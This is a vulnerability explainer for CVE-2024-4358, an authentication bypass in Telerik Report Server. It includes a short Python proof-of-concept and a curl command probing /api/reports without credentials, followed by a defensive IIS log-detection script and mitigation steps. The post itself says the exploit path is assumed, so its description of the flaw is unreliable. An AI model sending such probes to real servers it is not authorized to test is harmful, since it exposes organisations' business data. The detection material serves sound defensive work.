In May 2024, a critical vulnerability was discovered in Telerik Report Server, tracked as CVE-2024-4358. The flaw affects Telerik Report Server 2024 Q1 (10.0.24.305) and earlier when running on IIS. What makes it especially dangerous is that an unauthenticated attacker can reach restricted features by bypassing authentication entirely. Let’s break down how it works and why it’s dangerous, then walk through a simple proof-of-concept exploit.

What Is Telerik Report Server?

Telerik Report Server is a web-based tool for managing and scheduling reports, commonly used for business intelligence. When installed on Windows, it generally runs under IIS (Internet Information Services).

Vulnerability Overview

CVE-2024-4358 is an *authentication bypass* vulnerability: the normal login wall can be sidestepped, like walking into a locked office while everyone assumes you came in with a key.

Impact

- Attackers could gain access to restricted Telerik Report Server functions, potentially including report management, data exposure, or code execution (depending on what features are enabled).

How the Authentication Bypass Works

While the vendor Progress Software hasn’t published full technical details yet, researchers found that a particular API endpoint or resource does not properly check the authentication session or token before granting access to restricted features. Likely causes include:

- Certain endpoints are missing the [Authorize] attribute in ASP.NET, or
- JWT/cookie-based sessions are validated improperly.

Exploit Walkthrough: PoC Code

> WARNING: This is for educational and defensive purposes only. Do not use this exploit on systems you do not own!

Suppose the /api/reports endpoint is meant to require authentication but doesn’t. We can craft a simple HTTP request to fetch all reports without logging in.

Let’s use Python with the requests library.

import requests

# Replace with the actual target and port (default is 83)
TARGET = "http://victim-server:83"

# The API endpoint that is expected to be restricted
url = f"{TARGET}/api/reports"

# No authentication headers or cookies are sent; time out rather than hang
response = requests.get(url, timeout=10)

if response.status_code == 200:
    print("Vulnerable! Received data:")
    print(response.text[:200])  # Print only the first 200 characters
else:
    print("Not vulnerable or secured.")

Example Output

Vulnerable! Received data:
[{"Id":"123","Name":"Monthly Sales","Description":"..."} , ... ]

Depending on your setup, you can enumerate reports, download data, schedule jobs, or even upload/overwrite reports—all without logging in!

Even easier, you can use a browser or a curl command:

curl http://victim-server:83/api/reports

If you get report information back, the system is wide open.

Real-World Impact

- Data Exposure: Unauthenticated attackers can enumerate, view, or download sensitive business reports.
- Privilege Escalation: In some setups, restricted areas might allow code uploads or further attacks.
- Lateral Movement: Attackers could pivot from the Report Server to other connected apps or databases on the corporate network.

Detection

- Check your IIS logs for requests to /api/reports (or other restricted APIs) that succeeded (HTTP 200) without an authenticated session.
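As an added example (not code from the original post or from Progress), the following Python script implements that log check over IIS W3C extended logs: it reads the field names from the #Fields header, keeps only successful (2xx) responses on restricted paths such as /api/reports, and reports those with no authenticated caller, aggregated per client IP. The log lines are constructed, and the cs(Authorization) custom field is an assumption about your IIS logging configuration.

```python
"""Flag successful, unauthenticated requests to restricted Telerik Report Server
API paths in IIS W3C extended logs.

Added example for this post, not vendor code. Assumptions: logs are in IIS W3C
format with a #Fields header; cs-username is "-" when IIS did not authenticate
the caller; if a custom cs(Authorization) field is present (IIS enhanced
logging), it is preferred. SAMPLE_LOG below is constructed."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List

# Restricted path prefixes named in the post; add other restricted APIs as needed.
RESTRICTED_PREFIXES = ("/api/reports",)

# Constructed sample log: one authenticated hit, two unauthenticated 200s from
# the same client, one 401 (the auth wall held), and one unrelated login page hit.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-05-30 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-30 08:01:12 10.0.0.5 GET /api/reports - 83 alice 10.0.0.21 Mozilla/5.0 - 200 0 0 41
2024-05-30 08:02:33 10.0.0.5 GET /api/reports - 83 - 203.0.113.7 curl/8.4.0 - 200 0 0 17
2024-05-30 08:02:35 10.0.0.5 GET /api/reports - 83 - 203.0.113.7 curl/8.4.0 - 200 0 0 15
2024-05-30 08:02:50 10.0.0.5 GET /api/reports - 83 - 198.51.100.9 Mozilla/5.0 - 401 0 0 3
2024-05-30 08:03:01 10.0.0.5 GET /Login - 83 - 198.51.100.9 Mozilla/5.0 - 200 0 0 12
"""


@dataclass
class Finding:
    timestamp: str
    client_ip: str
    method: str
    path: str
    status: int
    user_agent: str


def parse_w3c(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per entry, keyed by the names in the most recent #Fields
    header (IIS emits a new header whenever the field set changes)."""
    fields: List[str] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # #Software, #Version, #Date directives
        values = line.split(" ")
        if not fields or len(values) != len(fields):
            continue  # no header yet or malformed line: skip, don't misattribute
        yield dict(zip(fields, values))


def is_restricted(path: str) -> bool:
    """Case-insensitive match, since IIS paths are case-insensitive."""
    return path.lower().startswith(RESTRICTED_PREFIXES)


def is_unauthenticated(entry: Dict[str, str]) -> bool:
    """IIS fills cs-username only for IIS-level auth (Windows/Basic). When the
    application does its own token auth, prefer a custom cs(Authorization)
    field if the log has one; otherwise fall back to cs-username."""
    if "cs(Authorization)" in entry:
        return entry["cs(Authorization)"] == "-"
    return entry.get("cs-username", "-") == "-"


def find_unauth_access(lines: Iterable[str]) -> List[Finding]:
    """Return 2xx responses on restricted paths with no authenticated caller.
    401/403 responses are ignored: there the auth wall held."""
    findings: List[Finding] = []
    for e in parse_w3c(lines):
        try:
            status = int(e.get("sc-status", ""))
        except ValueError:
            continue
        if not is_restricted(e.get("cs-uri-stem", "")):
            continue
        if not 200 <= status < 300:
            continue
        if not is_unauthenticated(e):
            continue
        findings.append(Finding(
            timestamp=f"{e.get('date', '')} {e.get('time', '')}",
            client_ip=e.get("c-ip", "-"),
            method=e.get("cs-method", "-"),
            path=e.get("cs-uri-stem", "-"),
            status=status,
            user_agent=e.get("cs(User-Agent)", "-"),
        ))
    return findings


def count_by_client(findings: List[Finding]) -> Counter:
    """Aggregate hits per source IP to spot enumeration."""
    return Counter(f.client_ip for f in findings)


if __name__ == "__main__":
    hits = find_unauth_access(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h.timestamp} {h.client_ip} {h.method} {h.path} -> {h.status} ({h.user_agent})")
    print("hits per client:", dict(count_by_client(hits)))
```

One caveat worth knowing before trusting the output: IIS only populates cs-username when IIS itself performed the authentication. Report Server does its own token-based login, so with default logging every request shows "-" there, and the script would flag legitimate users too. Either log the Authorization header as a custom field (as the script assumes) or correlate the hits with the application's own session logs before treating a 200 on /api/reports as evidence of bypass.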

Mitigation & Fix

- Upgrade Immediately: Progress has patched this vulnerability in newer versions. Check the Progress release notes and advisories for the fixed version.
- Restrict IIS Exposure: Limit Report Server to trusted networks/hosts only.
- Web Application Firewall (WAF): Add WAF rules to block direct access to sensitive Report Server endpoints from untrusted sources.


Conclusion

CVE-2024-4358 is a high-impact, easy-to-exploit vulnerability in Telerik Report Server. If you run any affected version, patch ASAP! Don’t let attackers sneak in the back door—secure your software today.

Timeline

Published on: 05/29/2024 15:16:06 UTC
Last modified on: 06/14/2024 17:59:33 UTC